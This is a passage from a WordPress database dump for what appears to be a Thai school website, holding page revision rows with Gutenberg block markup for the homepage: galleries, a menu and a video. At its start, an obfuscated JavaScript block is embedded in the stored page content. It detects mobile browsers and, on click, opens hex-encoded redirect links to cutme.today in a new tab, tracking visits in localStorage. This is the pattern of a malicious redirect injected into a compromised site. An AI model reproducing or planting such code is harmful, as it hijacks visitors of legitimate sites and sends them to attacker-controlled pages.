_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:32:44','2024-07-29 11:32:44','',19,'http://watprato.ssk.in.th/?p=92',0,'revision','',0),
(93,1,'2024-07-29 18:32:55','2024-07-29 11:32:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid 